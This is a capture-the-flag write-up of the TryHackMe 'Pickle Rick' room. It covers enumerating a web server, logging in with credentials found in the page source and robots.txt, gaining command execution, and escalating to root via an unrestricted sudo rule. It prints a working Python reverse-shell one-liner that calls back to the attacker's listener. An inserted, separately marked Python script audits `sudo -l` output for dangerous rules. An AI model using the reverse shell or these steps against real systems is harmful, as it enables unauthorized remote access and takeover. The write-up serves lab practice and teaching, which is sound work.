Vernilo hacks stuff
Pickle Rick


Last updated 3 years ago


A Rick and Morty CTF. Help turn Rick back into a human!

Pickle Rick is a Rick and Morty themed tryhackme room where we exploit a webserver to find 3 ingredients or flags.

Questions :

  1. What is the first ingredient Rick needs?

  2. What's the second ingredient Rick needs?

  3. What's the final ingredient Rick needs?

Enumeration

NMAP

nmap -sS -sC -sV -A -O -vv BOX_IP

output

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 08:16:72:a6:42:80:aa:21:3f:9e:2a:76:4c:bc:45:0d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDibc1nVIGXaLx8nF5hflDtQi7KVayIQjoV/97QvFHpe67phA9ozRb+o0Azrp3UBxc6zlGDJiPRPdgXZUL53Zygvip9Tj/8GYucBA1yzcN5gtWfR7cVG/vZo/ToDD2bTiVbMy1fW7zWa9Le9VEytFnsBFOk0ePEn5rI7wLuZ+HHaVTJegtq6KIVw9eQUCxTqfjEvFxCyJMSbwPXWdURGwVYOW3VVpU8awDkklUZRQ/ElsKGJLLF+CjtQ3/+aT9VeWKIP8n/k+ymFL0zvkygEGdMaUOFBiaZd8FAAiBAbHXNGg2Scsnmid8V9sXS0tyN4OuItZ7Xc26eKmlsCzDkJlJJ
|   256 38:e1:90:b4:69:a0:49:f8:1d:cb:d5:1a:79:22:a2:b1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGo31VvNkXrpUtTcaSzV68TxybntTXNKXfLV7uueau4r5ROiko7CqYXSBBbcKovi06b+fPCIxdnu84ZHNrMK41Q=
|   256 a0:48:4b:8f:87:64:67:ca:d3:d3:61:3a:b2:80:f3:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlvtA3D1u0/IPcguHsofaDoMS4J2/VyFUsc5Ko+hKtM
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool

we have two open ports, 22 (ssh) and 80 (apache2 httpd)

Site

Source Code

Username: R1ckRul3s

find out interesting directories and files

robots.txt

(a string like a password???)

Login

trying to log in with User: R1ckRul3s and Password: Wubbalubbadubdub at /login.php

Success

RCE

on this panel, we were able to execute commands on the system

then let's try a reverse shell from that

for this we will use python, so we have to know where it is (and if it exists)

all right, let's run the reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(replacing the IP address with my THM VPN IP)

Reverse Shell

Shell to TTY

python3 -c "import pty; pty.spawn('/bin/bash')"

answering the first question

cat Sup3rS3cretPickl3Ingred.txt

walking to the second question

answering the second question

walking to root

looking at the commands that the user can run

sudo -l

EASY!!!!!

We can run ANY command as root without a password :O
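
From the defender's side, this is the sudoers misconfiguration worth auditing for. The sketch below is an added example, not part of the original write-up: it parses `sudo -l` output and flags rules that let an account reach root, with `NOPASSWD: ALL` as the critical case. The sample output, the host name `web01` and the helper name `audit_sudo_l` are all constructed for illustration.

```python
import re

# Constructed sample of `sudo -l` output (not captured from the room's box).
SAMPLE = """\
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass

User www-data may run the following commands on web01:
    (ALL) NOPASSWD: ALL
    (root) NOPASSWD: /usr/sbin/service apache2 reload, PASSWD: /usr/bin/less /var/log/syslog
    (backup) /usr/bin/rsync
"""

RULE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")  # NOPASSWD:, PASSWD:, SETENV:, NOEXEC:, ...


def audit_sudo_l(text):
    """Return (severity, runas, command) for rules that can run as root."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # Defaults lines and headers are not rules
        runas = m.group("runas").strip()
        users = {u.strip() for u in runas.split(":")[0].split(",")}
        if not users & {"ALL", "root"}:
            continue  # rule cannot run anything as root
        nopasswd = False  # a tag applies to later commands in the same rule
        for item in re.split(r"(?<!\\),\s*", m.group("cmds")):
            item = item.strip()
            while (t := TAG.match(item)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                item = item[t.end():]
            if item == "ALL":
                sev = "critical" if nopasswd else "high"
            elif nopasswd:
                sev = "review"  # passwordless, but limited to one command
            else:
                continue  # specific command that still needs a password
            findings.append((sev, runas, item))
    return findings


if __name__ == "__main__":
    for sev, runas, cmd in audit_sudo_l(SAMPLE):
        print(f"[{sev}] runas=({runas}) command={cmd}")
```

Feed it the output of `sudo -l -U <account>` for service accounts such as the web server user, which should normally have no sudo rules at all.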

Root flag (3rd question)
